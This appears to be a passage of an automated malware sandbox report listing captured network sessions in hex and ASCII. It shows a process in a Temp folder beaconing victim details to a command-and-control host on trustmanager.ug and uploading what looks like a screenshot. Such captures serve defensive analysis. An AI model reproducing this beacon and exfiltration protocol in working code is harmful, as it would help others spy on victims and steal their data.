68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.624887943 CEST	17274	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.3	49837	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.759079933 CEST	17280	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:09.785136938 CEST	17282	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.785260916 CEST	17282	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.3	49838	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.004375935 CEST	17283	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.030592918 CEST	17284	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.030606985 CEST	17284	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:10.035629034 CEST	17285	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:10.035767078 CEST	17285	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:10.045497894 CEST	17295	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:10.045682907 CEST	17298	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:10.071613073 CEST	17308	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:10.071667910 CEST	17324	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:10.097193003 CEST	17356	OUT	Data Raw: f9 7a 6c bd 63 02 9a 74 bd 3a 41 f2 b6 da cf 57 3e 94 f5 73 53 c9 25 b3 2d 54 83 de 25 93 a0 40 df 72 5a 89 fc 3b 27 f0 48 0d 0b 2b 03 c1 35 2a dd 4a 3f 8c d1 7a ab a8 72 50 7b c4 a6 fa 1d d2 f4 50 6a 16 d3 6e 53 ac 4d 5a eb 7d 30 ea d5 32 ea 2f Data Ascii: zlct:AW>sS%-T%@rZ;'H+5*J?zrP{PjnSMZ}02/Gzdv5DO>`)^kW\|V;qBr\R$pjLLVGu.(RQbu2DPbv).}cuZxm$iR
Aug 23, 2021 02:09:10.097276926 CEST	17369	OUT	Data Raw: 1b 3f ec d5 cb df 19 35 ff 00 89 af 35 39 b4 b8 be c1 79 6e b6 b3 e9 c2 63 b4 c4 30 4e d7 c6 43 6f 1b c1 c1 c1 ec 46 73 cc d1 de a5 50 82 d3 fa da c5 3a b2 6e ff 00 d6 f7 fc cd a8 b5 bb 1d 3a 49 a5 d1 b4 cb ab 6b 86 80 c5 0c f7 17 82 57 85 9b 86 Data Ascii: ?559ync0NCoFsP:n:IkWqgn@d1qUat:-Q{ia-<A8MGcp9CMOq*ltzu}B)'mw?etIVDD9j+[[8ftuk>^f2+0y%-/c[[HWIt%o
Aug 23, 2021 02:09:10.097306013 CEST	17377	OUT	Data Raw: 9a a5 da da 3f 97 1c 03 e6 48 77 e3 1f ed b7 3d 76 8f e1 a8 3c 5d a6 eb cf ae 5f 6b f6 b1 5c be 8e 7e 7b 3b e8 41 fb 3a db f4 8d 03 8f 94 60 61 76 67 20 8c 63 35 c6 ec 14 6c 15 7c 8e f7 fe bf af f8 3d c5 cc ad 6f eb fa ff 00 81 d8 f4 db db 8d 36 Data Ascii: ?Hw=v<]_k\~{;A:`avg c5l\|=o6QTRS(k`Gm{=K[TRVxi#>3;?lmykISi[~ugog#x[VEOkKs#RW&#{H/<IH>e9~5Oj6-(
Aug 23, 2021 02:09:10.123471975 CEST	17378	OUT	Data Raw: cb 59 b0 ae ab a7 43 a4 68 7a 35 d7 d8 ef 56 07 d4 af ae 43 6d fb 3e f4 e1 8b 00 4a ec 87 07 23 9f 9c 81 c9 e7 99 93 c5 1a fc d0 4f 04 ba e6 a5 2c 37 0d ba 78 a4 bb 76 59 4f 1c b0 27 0d d0 75 f4 a6 2f 88 35 88 f5 79 b5 58 75 2b a8 35 09 b2 5e e2 Data Ascii: YChz5VCm>J#O,7xvYO'u/5yXu+5^S\`p8p(k-{.&..v5w0bAEbWzN\X^ic!9?h+W0S$!k[]Rn"urWOIK<}O+gvgcW_L`D
Aug 23, 2021 02:09:10.149705887 CEST	17379	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 